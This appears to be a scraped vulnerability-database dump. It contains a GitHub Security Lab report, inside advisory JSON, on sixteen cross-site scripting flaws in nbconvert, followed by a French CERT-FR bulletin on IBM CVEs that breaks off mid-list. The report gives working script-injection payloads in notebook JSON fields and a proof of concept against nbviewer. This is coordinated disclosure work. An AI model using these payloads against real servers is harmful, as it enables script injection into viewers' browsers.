"details": "Most of the fixes will be in this repo, though, so having it here gives us the private fork to work on patches\n\nBelow is currently a duplicate of the original report:\n\n----\n\nReceived on security@ipython.org unedited, I\u0027m not sure if we want to make it separate advisories. \n\nPasted raw for now, feel free to edit or make separate advisories if you have the rights to. \n\nI think the most important is to switch back from nbviewer.jupyter.org -\u003e nbviewer.org at the cloudflare level I guess ? There might be fastly involved as well.\n--- \n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\n### References\n_Are there any links users can visit to find out more?_\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [example link to repo](http://example.com)\n* Email us at [example email address](mailto:example@example.com)\n\n--- \n\n# GitHub Security Lab (GHSL) Vulnerability Report\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [nbconvert](https://github.com/jupyter/nbconvert).\n\nWe are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.\n\nIf at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2021-1013`, `GHSL-2021-1014`, `GHSL-2021-1015`, `GHSL-2021-1016`, `GHSL-2021-1017`, `GHSL-2021-1018`, `GHSL-2021-1019`, `GHSL-2021-1020`, `GHSL-2021-1021`, `GHSL-2021-1022`, `GHSL-2021-1023`, `GHSL-2021-1024`, `GHSL-2021-1025`, `GHSL-2021-1026`, `GHSL-2021-1027` or `GHSL-2021-1028` as a reference).\n\nIf you are _NOT_ the correct point of contact for this report, please let us know!\n\n## Summary\n\nWhen using nbconvert to generate an HTML version of a user-controllable notebook, it is possible to inject arbitrary HTML which may lead to Cross-Site Scripting (XSS) vulnerabilities if these HTML notebooks are served by a web server (eg: nbviewer) \n\n## Product\n\nnbconvert\n\n## Tested Version\n\n[v5.5.0](https://github.com/jupyter/nbconvert/releases/tag/5.5.0)\n\n## Details\n\n### Issue 1: XSS in notebook.metadata.language_info.pygments_lexer (`GHSL-2021-1013`)\n\nAttacker in control of a notebook can inject arbitrary unescaped HTML in the `notebook.metadata.language_info.pygments_lexer` field such as the following:\n\n```json\n\"metadata\": {\n \"language_info\": {\n \"pygments_lexer\": \"ipython3-foo\\\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\n }\n}\n```\n\nThis node is read in the [`from_notebook_node`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/exporters/html.py#L135-L140) method:\n\n```python\ndef from_notebook_node(self, nb, resources=None, **kw):\n langinfo = nb.metadata.get(\u0027language_info\u0027, {})\n lexer = langinfo.get(\u0027pygments_lexer\u0027, langinfo.get(\u0027name\u0027, None))\n highlight_code = self.filters.get(\u0027highlight_code\u0027, Highlight2HTML(pygments_lexer=lexer, parent=self))\n self.register_filter(\u0027highlight_code\u0027, highlight_code)\n return super().from_notebook_node(nb, resources, **kw)\n```\n\nIt is then assigned to `language` var and passed down to [`_pygments_highlight`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/filters/highlight.py#L90)\n\n```python\nfrom pygments.formatters import LatexFormatter\nif not language:\n language=self.pygments_lexer\nlatex = _pygments_highlight(source, LatexFormatter(), language, metadata)\n```\n\nIn this method, the `language` variable is [concatenated to `highlight hl-` string to conform the `cssclass`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/nbconvert/filters/highlight.py#L56) passed to the `HTMLFormatter` constructor:\n\n``` python\nreturn _pygments_highlight(source if len(source) \u003e 0 else \u0027 \u0027,\n # needed to help post processors:\n HtmlFormatter(cssclass=\" highlight hl-\"+language),\n language, metadata)\n```\n\nThe `cssclass` variable is then [concatenated in the outer div class attribute](https://github.com/pygments/pygments/blob/30cfa26201a27dee1f8e6b0d600cad1138e64507/pygments/formatters/html.py#L791)\n\n``` python\nyield 0, (\u0027\u003cdiv\u0027 + (self.cssclass and \u0027 class=\"%s\"\u0027 % self.cssclass) + (style and (\u0027 style=\"%s\"\u0027 % style)) + \u0027\u003e\u0027)\n```\n\nNote that the `cssclass` variable is also used in other unsafe places such as [`\u0027\u003ctable class=\"%stable\"\u003e\u0027 % self.cssclass + filename_tr +`](https://github.com/pygments/pygments/blob/30cfa26201a27dee1f8e6b0d600cad1138e64507/pygments/formatters/html.py#L711))\n\n### Issue 2: XSS in notebook.metadata.title (`GHSL-2021-1014`)\n\nThe `notebook.metadata.title` node is rendered directly to the [`index.html.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/lab/index.html.j2#L12-L13) HTML template with no escaping: \n\n```html\n{% set nb_title = nb.metadata.get(\u0027title\u0027, \u0027\u0027) or resources[\u0027metadata\u0027][\u0027name\u0027] %}\n\u003ctitle\u003e{{nb_title}}\u003c/title\u003e\n```\n\nThe following `notebook.metadata.title` node will execute arbitrary javascript:\n\n```json\n \"metadata\": {\n \"title\": \"TITLE\u003c/title\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\"\n }\n```\n\nNote: this issue also affect other templates, not just the `lab` one.\n\n### Issue 3: XSS in notebook.metadata.widgets(`GHSL-2021-1015`)\n\nThe `notebook.metadata.widgets` node is rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/lab/index.html.j2#L12-L13) HTML template with no escaping: \n\n```html\n{% set mimetype = \u0027application/vnd.jupyter.widget-state+json\u0027%}\n{% if mimetype in nb.metadata.get(\"widgets\",{})%}\n\u003cscript type=\"{{ mimetype }}\"\u003e\n{{ nb.metadata.widgets[mimetype] | json_dumps }}\n\u003c/script\u003e\n{% endif %}\n```\n\nThe following `notebook.metadata.widgets` node will execute arbitrary javascript:\n\n```json\n \"metadata\": {\n \"widgets\": {\n \"application/vnd.jupyter.widget-state+json\": {\"foo\": \"pwntester\u003c/script\u003e\u003cscript\u003ealert(1);//\"}\n }\n }\n```\n\nNote: this issue also affect other templates, not just the `lab` one.\n\n### Issue 4: XSS in notebook.cell.metadata.tags(`GHSL-2021-1016`)\n\nThe `notebook.cell.metadata.tags` nodes are output directly to the [`celltags.j2`](https://github.com/jupyter/nbconvert/blob/3c0f82d1acbcf2264ae0fa892141a037563aabd0/share/jupyter/nbconvert/templates/base/celltags.j2#L4) HTML template with no escaping: \n\n```\n{%- macro celltags(cell) -%}\n {% if cell.metadata.tags | length \u003e 0 -%}\n {% for tag in cell.metadata.tags -%}\n {{ \u0027 celltag_\u0027 ~ tag -}}\n {%- endfor -%}\n {%- endif %}\n{%- endmacro %}\n```\n\nThe following `notebook.cell.metadata.tags` node will execute arbitrary javascript:\n\n```json\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"id\": \"727d1a5f\",\n \"metadata\": {\n \"tags\": [\"FOO\\\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cdiv \\\"\"]\n },\n \"outputs\": [],\n \"source\": []\n }\n ],\n```\n\nNote: this issue also affect other templates, not just the `lab` one.\n\n### Issue 5: XSS in output data text/html cells(`GHSL-2021-1017`)\n\nUsing the `text/html` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:\n\nThe following is an example of a cell with `text/html` output executing arbitrary javascript code:\n\n```json\n {\n \"cell_type\": \"code\",\n \"execution_count\": 5,\n \"id\": \"b72e53fa\",\n \"metadata\": {},\n \"outputs\": [\n {\n \"data\": {\n \"text/html\": [\n \"\u003cscript\u003ealert(1)\u003c/script\u003e\"\n ]\n },\n \"execution_count\": 5,\n \"metadata\": {},\n \"output_type\": \"execute_result\"\n }\n ],\n \"source\": [\n \"import os; os.system(\u0027touch /tmp/pwned\u0027)\"\n ]\n },\n```\n\n### Issue 6: XSS in output data image/svg+xml cells(`GHSL-2021-1018`)\n\nUsing the `image/svg+xml` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. \n\nThe `cell.output.data[\"image/svg+xml\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping\n\n```\n{%- else %}\n{{ output.data[\u0027image/svg+xml\u0027] }}\n{%- endif %}\n```\n\nThe following `cell.output.data[\"image/svg+xml\"]` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"image/svg+xml\": [\"\u003cscript\u003econsole.log(\\\"image/svg+xml output\\\")\u003c/script\u003e\"]\n },\n \"execution_count\": null,\n \"metadata\": {\n }\n }\n```\n\n### Issue 7: XSS in notebook.cell.output.svg_filename(`GHSL-2021-1019`)\n\nThe `cell.output.svg_filename` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping\n\n```\n{%- if output.svg_filename %}\n\u003cimg src=\"{{ output.svg_filename | posix_path }}\"\u003e\n```\n\nThe following `cell.output.svg_filename` node will escape the `img` tag context and execute arbitrary javascript:\n\n```json\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"id\": \"b72e53fa\",\n \"metadata\": {},\n \"outputs\": [\n {\n \"output_type\": \"execute_result\",\n \"svg_filename\": \"\\\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\",\n \"data\": {\n \"image/svg+xml\": [\"\"]\n },\n \"execution_count\": null,\n \"metadata\": {\n }\n }\n ],\n \"source\": [\"\"]\n },\n```\n\n### Issue 8: XSS in output data text/markdown cells(`GHSL-2021-1020`)\n\nUsing the `text/markdown` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. \n\nThe `cell.output.data[\"text/markdown\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping\n\n```\n{{ output.data[\u0027text/markdown\u0027] | markdown2html }}\n```\n\nThe following `cell.output.data[\"text/markdown\"]` node will execute arbitrary javascript:\n\n```\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"text/markdown\": [\"\u003cscript\u003econsole.log(\\\"text/markdown output\\\")\u003c/script\u003e\"]\n },\n \"execution_count\": null,\n \"metadata\": {}\n }\n```\n\n### Issue 9: XSS in output data application/javascript cells(`GHSL-2021-1021`)\n\nUsing the `application/javascript` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:\n\nThe `cell.output.data[\"application/javascript\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping\n\n```\n\u003cscript type=\"text/javascript\"\u003e\nvar element = document.getElementById(\u0027{{ div_id }}\u0027);\n{{ output.data[\u0027application/javascript\u0027] }}\n\u003c/script\u003e\n```\n\nThe following `cell.output.data[\"application/javascript\"]` node will execute arbitrary javascript:\n\n```\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"application/javascript\": [\"console.log(\\\"application/javascript output\\\")\"]\n },\n \"execution_count\": null,\n \"metadata\": {}\n }\n```\n\n### Issue 10: XSS is output.metadata.filenames image/png and image/jpeg(`GHSL-2021-1022`)\n\nThe `cell.output.metadata.filenames[\"images/png\"]` and `cell.metadata.filenames[\"images/jpeg\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping:\n\n```\n{%- if \u0027image/png\u0027 in output.metadata.get(\u0027filenames\u0027, {}) %}\n\u003cimg src=\"{{ output.metadata.filenames[\u0027image/png\u0027] | posix_path }}\"\n```\n\nThe following `filenames` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"image/png\": [\"\"]\n },\n \"execution_count\": null,\n \"metadata\": {\n \"filenames\": {\n \"image/png\": \"\\\"\u003e\u003cscript\u003econsole.log(\\\"output.metadata.filenames.image/png injection\\\")\u003c/script\u003e\" \n }\n }\n }\n```\n\n### Issue 11: XSS in output data image/png and image/jpeg cells(`GHSL-2021-1023`)\n\nUsing the `image/png` or `image/jpeg` output data mime type allows arbitrary javascript to be executed when rendering an HTML notebook. \n\nThe `cell.output.data[\"images/png\"]` and `cell.output.data[\"images/jpeg\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping:\n\n```\n{%- else %}\n\u003cimg src=\"data:image/png;base64,{{ output.data[\u0027image/png\u0027] }}\"\n{%- endif %}\n```\n\nThe following `cell.output.data[\"image/png\"]` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"image/png\": [\"\\\"\u003e\u003cscript\u003econsole.log(\\\"image/png output\\\")\u003c/script\u003e\"]\n },\n \"execution_count\": null,\n \"metadata\": {}\n }\n```\n\n### Issue 12: XSS is output.metadata.width/height image/png and image/jpeg(`GHSL-2021-1024`)\n\nThe `cell.output.metadata.width` and `cell.output.metadata.height` nodes of both `image/png` and `image/jpeg` cells are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping:\n\n```\n{%- set width=output | get_metadata(\u0027width\u0027, \u0027image/png\u0027) -%}\nwidth={{ width }}\n{%- set height=output | get_metadata(\u0027height\u0027, \u0027image/png\u0027) -%}\nheight={{ height }}\n```\n\nThe following `output.metadata.width` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"image/png\": [\"abcd\"]\n },\n \"execution_count\": null,\n \"metadata\": {\n \"width\": \"\u003e\u003cscript\u003econsole.log(\\\"output.metadata.width png injection\\\")\u003c/script\u003e\"\n }\n }\n```\n\n### Issue 13: XSS in output data application/vnd.jupyter.widget-state+json cells(`GHSL-2021-1025`)\n\nThe `cell.output.data[\"application/vnd.jupyter.widget-state+json\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping:\n\n```\n{% set datatype_list = output.data | filter_data_type %}\n{% set datatype = datatype_list[0]%}\n\u003cscript type=\"{{ datatype }}\"\u003e\n{{ output.data[datatype] | json_dumps }}\n\u003c/script\u003e\n```\n\nThe following `cell.output.data[\"application/vnd.jupyter.widget-state+json\"]` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"application/vnd.jupyter.widget-state+json\": \"\\\"\u003c/script\u003e\u003cscript\u003econsole.log(\u0027output.data.application/vnd.jupyter.widget-state+json injection\u0027)//\"\n },\n \"execution_count\": null,\n \"metadata\": {}\n }\n```\n\n### Issue 14: XSS in output data application/vnd.jupyter.widget-view+json cells(`GHSL-2021-1026`)\n\nThe `cell.output.data[\"application/vnd.jupyter.widget-view+json\"]` nodes are rendered directly to the [`base.html.j2`](https://github.com/jupyter/nbconvert/blob/main/share/jupyter/nbconvert/templates/classic/base.html.j2) HTML template with no escaping:\n\n```\n{% set datatype_list = output.data | filter_data_type %}\n{% set datatype = datatype_list[0]%}\n\u003cscript type=\"{{ datatype }}\"\u003e\n{{ output.data[datatype] | json_dumps }}\n\u003c/script\u003e\n```\n\nThe following `cell.output.data[\"application/vnd.jupyter.widget-view+json\"]` node will execute arbitrary javascript:\n\n```json\n {\n \"output_type\": \"execute_result\",\n \"data\": {\n \"application/vnd.jupyter.widget-view+json\": \"\\\"\u003c/script\u003e\u003cscript\u003econsole.log(\u0027output.data.application/vnd.jupyter.widget-view+json injection\u0027)//\"\n },\n \"execution_count\": null,\n \"metadata\": {}\n }\n```\n\n\n### Issue 15: XSS in raw cells(`GHSL-2021-1027`)\n\nUsing a `raw` cell type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:\n\nThe following is an example of a `raw` cell executing arbitrary javascript code:\n\n```json\n {\n \"cell_type\": \"raw\",\n \"id\": \"372c2bf1\",\n \"metadata\": {},\n \"source\": [\n \"Payload in raw cell \u003cscript\u003ealert(1)\u003c/script\u003e\"\n ]\n }\n```\n\n### Issue 16: XSS in markdown cells(`GHSL-2021-1028`)\n\nUsing a `markdown` cell type allows arbitrary javascript to be executed when rendering an HTML notebook. This is probably by design, however, it would be nice to enable an option which uses an HTML sanitizer preprocessor to strip down all javascript elements:\n\nThe following is an example of a `markdown` cell executing arbitrary javascript code:\n\n```json\n {\n \"cell_type\": \"markdown\",\n \"id\": \"2d42de4a\",\n \"metadata\": {},\n \"source\": [\n \"\u003cscript\u003ealert(1)\u003c/script\u003e\"\n ]\n },\n```\n\n### Proof of Concept\n\nThese vulnerabilities may affect any server using nbconvert to generate HTML and not using a secure content-security-policy (CSP) policy. For example [nbviewer](https://nbviewer.jupyter.org) is vulnerable to the above mentioned XSS issues:\n\n1. Create Gist with payload. eg:\n- `https://gist.github.com/pwntester/ff027d91955369b85f99bb1768b7f02c`\n\n2. Then load gist on nbviewer. eg:\n- `https://nbviewer.jupyter.org/gist/pwntester/ff027d91955369b85f99bb1768b7f02c`\n\nNote: response is served with `content-security-policy: connect-src \u0027none\u0027;`\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThese issues were discovered and reported by GHSL team member [@pwntester (Alvaro Mu\u00f1oz)](https://github.com/pwntester).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2021-1013`, `GHSL-2021-1014`, `GHSL-2021-1015`, `GHSL-2021-1016`, `GHSL-2021-1017`, `GHSL-2021-1018`, `GHSL-2021-1019`, `GHSL-2021-1020`, `GHSL-2021-1021`, `GHSL-2021-1022`, `GHSL-2021-1023`, `GHSL-2021-1024`, `GHSL-2021-1025`, `GHSL-2021-1026`, `GHSL-2021-1027` or `GHSL-2021-1028` in any communication regarding these issues.\n\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).\n",
"id": "GHSA-9jmq-rx5f-8jwq",
"modified": "2024-01-25T22:10:32Z",
"published": "2022-08-10T17:51:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jupyter/nbconvert/security/advisories/GHSA-9jmq-rx5f-8jwq"
},
{
"type": "WEB",
"url": "https://github.com/jupyter/nbviewer/security/advisories/GHSA-h274-fcvj-h2wm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32862"
},
{
"type": "PACKAGE",
"url": "https://github.com/jupyter/nbconvert"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/nbconvert/PYSEC-2022-249.yaml"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00003.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "nbconvert vulnerable to cross-site scripting (XSS) via multiple exploit paths"
}
CERTFR-2024-AVI-1103
Vulnerability from certfr_avis - Published: 2024-12-20 - Updated: 2024-12-20
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 | ||
| IBM | Sterling | Sterling External Authentication Server versions 6.1.0.x antérieures à 6.1.0.2 ifix 01 | ||
| IBM | QRadar SIEM | Security QRadar Log Management AQL Plugin versions antérieures à 1.1.0 | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.0.x antérieures à 6.0.3.1 (fixpack) GA | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP5 | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.1.x antérieures à 6.1.0.1 (fixpack) GA | ||
| IBM | Sterling | Sterling Secure Proxy versions 6.2.x antérieures à 6.2.0.0 ifix 01 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.11_ifix001 |
References
| Title | Publication Time | Tags | ||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling External Authentication Server versions 6.1.0.x ant\u00e9rieures \u00e0 6.1.0.2 ifix 01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": " Security QRadar Log Management AQL Plugin versions ant\u00e9rieures \u00e0 1.1.0",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.0.x ant\u00e9rieures \u00e0 6.0.3.1 (fixpack) GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP5",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.1.x ant\u00e9rieures \u00e0 6.1.0.1 (fixpack) GA",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Secure Proxy versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.0 ifix 01",
"product": {
"name": "Sterling",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.11_ifix001",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2017-9937",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9937"
},
{
"name": "CVE-2023-52356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52356"
},
{
"name": "CVE-2023-41334",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41334"
},
{
"name": "CVE-2023-37536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37536"
},
{
"name": "CVE-2023-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40217"
},
{
"name": "CVE-2024-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22871"
},
{
"name": "CVE-2024-7006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7006"
},
{
"name": "CVE-2023-3316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3316"
},
{
"name": "CVE-2024-36138",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36138"
},
{
"name": "CVE-2018-14042",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14042"
},
{
"name": "CVE-2024-29041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29041"
},
{
"name": "CVE-2021-45960",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45960"
},
{
"name": "CVE-2024-22020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22020"
},
{
"name": "CVE-2022-3626",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3626"
},
{
"name": "CVE-2023-38264",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38264"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2020-12401",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-12401"
},
{
"name": "CVE-2018-15209",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-15209"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2018-17100",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-17100"
},
{
"name": "CVE-2022-3599",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3599"
},
{
"name": "CVE-2022-34266",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34266"
},
{
"name": "CVE-2020-35521",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-35521"
},
{
"name": "CVE-2023-0796",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0796"
},
{
"name": "CVE-2023-50386",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50386"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2023-52425",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52425"
},
{
"name": "CVE-2024-23944",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23944"
},
{
"name": "CVE-2022-48554",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48554"
},
{
"name": "CVE-2024-39008",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39008"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2023-30086",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30086"
},
{
"name": "CVE-2019-11727",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11727"
},
{
"name": "CVE-2024-25638",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25638"
},
{
"name": "CVE-2022-2057",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2057"
},
{
"name": "CVE-2019-6128",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6128"
},
{
"name": "CVE-2023-26965",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26965"
},
{
"name": "CVE-2022-22823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22823"
},
{
"name": "CVE-2023-52426",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52426"
},
{
"name": "CVE-2022-2058",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2058"
},
{
"name": "CVE-2024-45082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45082"
},
{
"name": "CVE-2023-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50782"
},
{
"name": "CVE-2022-3627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3627"
},
{
"name": "CVE-2022-2867",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2867"
},
{
"name": "CVE-2023-0286",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0286"
},
{
"name": "CVE-2023-32067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32067"
},
{
"name": "CVE-2022-3598",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3598"
},
{
"name": "CVE-2023-0798",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0798"
},
{
"name": "CVE-2019-11358",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11358"
},
{
"name": "CVE-2023-2731",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2731"
},
{
"name": "CVE-2023-0803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0803"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2023-30774",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30774"
},
{
"name": "CVE-2023-4759",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4759"
},
{
"name": "CVE-2017-11613",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-11613"
},
{
"name": "CVE-2017-12652",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-12652"
},
{
"name": "CVE-2024-41752",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41752"
},
{
"name": "CVE-2023-50447",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50447"
},
{
"name": "CVE-2018-18508",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-18508"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2024-34447",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34447"
},
{
"name": "CVE-2024-33883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33883"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2024-29025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29025"
},
{
"name": "CVE-2022-22844",
